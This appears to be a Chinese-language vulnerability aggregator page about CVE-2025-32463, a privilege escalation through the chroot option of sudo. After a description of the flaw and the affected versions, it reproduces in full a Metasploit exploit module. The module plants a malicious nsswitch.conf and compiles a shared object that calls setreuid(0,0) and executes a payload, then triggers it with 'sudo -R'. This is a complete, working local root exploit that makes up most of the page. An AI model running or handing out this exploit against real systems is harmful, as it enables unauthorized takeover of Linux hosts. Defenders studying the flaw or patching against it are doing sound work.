Sudo Chroot 1917 Privilege Escalation

漏洞信息

漏洞名称: Sudo Chroot 1.9.17 Privilege Escalation

漏洞编号:

  • CVE: CVE-2025-32463

漏洞类型: 权限提升

漏洞等级: 高危

漏洞描述: Sudo是一个在Unix和Linux操作系统中广泛使用的程序,允许用户以其他用户的权限运行程序,通常是超级用户。它被设计为允许系统管理员委派权限,提供细粒度的访问控制到系统命令。Sudo在多种部署场景中都非常常见,尤其是在需要多用户管理权限的企业环境中。

该漏洞存在于Sudo的chroot功能中,允许用户在执行命令时使用chroot选项。此选项旨在允许用户在指定的根目录下运行命令(如果sudoers文件允许)。在版本1.9.14中的更改允许通过chroot使用用户指定的根目录解析路径,而sudoers仍在评估中。这使得攻击者可以诱使Sudo加载任意共享对象,从而导致权限提升。

此漏洞的安全风险非常高,因为它允许本地用户通过构造恶意的共享对象文件来提升权限,无需任何形式的认证即可执行任意代码。这意味着攻击者可以完全控制系统,访问敏感数据,或进行其他恶意活动。由于Sudo的广泛使用,这个漏洞的影响范围非常广,尤其是在多用户环境中。

产品名称: Sudo

影响版本: 1.9.14 <= version < 1.9.17p1

来源: https://github.com/rapid7/metasploit-framework/blob/d5a266e045849fc9b037f4b35387776293b40001/modules%2Fexploits%2Flinux%2Flocal%2Fsudo_chroot_cve_2025_32463.rb

类型: rapid7/metasploit-framework:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = NormalRanking

  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Post::Linux::Compile
  include Msf::Post::Linux::Packages
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Sudo Chroot 1.9.17 Privilege Escalation',
        'Description' => %q{
          Sudo before version 1.19.17p1 allows user to use `chroot` option, when
          executing command. The option is intended to run a command with
          user-selected root directory (if sudoers file allow it). Change in version
          1.9.14 allows resolving paths via `chroot` using user-specified root
          directory when sudoers is still evaluating.
          This allows the attacker to trick Sudo into loading arbitrary shared object,
          thus resulting in a privilege escalation.
        },
        'License' => MSF_LICENSE,

        'Author' => [
          'msutovsky-r7', # module dev
          'Stratascale', # poc dev
          'Rich Mirch' # security research
        ],
        'Platform' => [ 'linux' ],

        'Arch' => [ ARCH_CMD ],

        # chmod has some issues for meterpreter, forcing shell
        'SessionTypes' => [ 'shell' ],

        'Targets' => [[ 'Auto', {} ]],

        'Privileged' => true,

        'References' => [
          [ 'EDB', '52352' ],
          [ 'URL', 'https://www.helpnetsecurity.com/2025/07/01/sudo-local-privilege-escalation-vulnerabilities-fixed-cve-2025-32462-cve-2025-32463/'],
          [ 'CVE', '2025-32463']
        ],
        'DisclosureDate' => '2025-06-30',

        'DefaultTarget' => 0,

        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
        }
      )
    )

    # force exploit is used to bypass the check command results
    register_advanced_options [
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
    ]
  end

  def check
    sudo_version = installed_package_version('sudo')

    return CheckCode::Unknown('Could not identify the version of sudo.') if sudo_version.blank?

    return CheckCode::Safe if !file?('/etc/nsswitch.conf')

    return CheckCode::Appears("Running version #{sudo_version}") if Rex::Version.new(sudo_version).between?(Rex::Version.new('1.9.14'), Rex::Version.new('1.9.17'))

    CheckCode::Safe("Sudo #{sudo_version} is not vulnerable")
  end

  def exploit
    # Check if we're already root
    if !datastore['ForceExploit'] && is_root?
      fail_with Failure::None, 'Session already has root privileges. Set ForceExploit to override'
    end

    # needs to compile in real-time to adjust payload execution path
    fail_with Failure::NotFound, 'Module needs to compile payload on target machine' unless live_compile?

    payload_file = rand_text_alphanumeric(5..10)

    existing_shell = cmd_exec('echo $0 || echo ${SHELL}')

    return Failure::NotFound, 'Could not find shell' unless file?(existing_shell)

    upload_and_chmodx("#{datastore['WritableDir']}/#{payload_file}", "#!#{existing_shell}\n#{payload.encoded}")

    register_files_for_cleanup("#{datastore['WritableDir']}/#{payload_file}")

    temp_dir = "#{datastore['WritableDir']}/#{rand_text_alphanumeric(5..10)}"

    base_dir = rand_text_alphanumeric(5..10)

    lib_filename = rand_text_alphanumeric(5..10)

    mkdir(temp_dir)

    cd(temp_dir)

    mkdir("#{base_dir}/etc")
    mkdir('libnss_')

    return Failure::PayloadFailed, 'Failed to create malicious nsswitch.conf file' unless write_file("#{base_dir}/etc/nsswitch.conf", "passwd: /#{lib_filename}\n")

    return Failure::PayloadFailed, 'Failed to copy /etc/group' unless copy_file('/etc/group', "#{base_dir}/etc/group")

    exploit_code = %<
    #include <unistd.h>

    __attribute__((constructor))
    void exploit(void) {
      setreuid(0,0);
      execve("#{datastore['WritableDir']}/#{payload_file}",NULL,NULL);

    }>

    upload_and_compile("#{temp_dir}/libnss_/#{lib_filename}.so.2", exploit_code, "-shared -fPIC -Wl,-init,#{base_dir}")

    cmd_exec("sudo -R #{base_dir} #{base_dir}")

    timeout = 30
    print_status 'Launching exploit...'
    output = cmd_exec 'command', nil, timeout
    output.each_line { |line| vprint_status line.chomp }
  end
end


Github Poc
#rapid7/metasploit-framework:github issues #权限提升
Sudo Chroot 1917 Privilege Escalation
http://example.com/2025/07/22/github_1551613691/
作者
lianccc
发布于
2025年7月22日
许可协议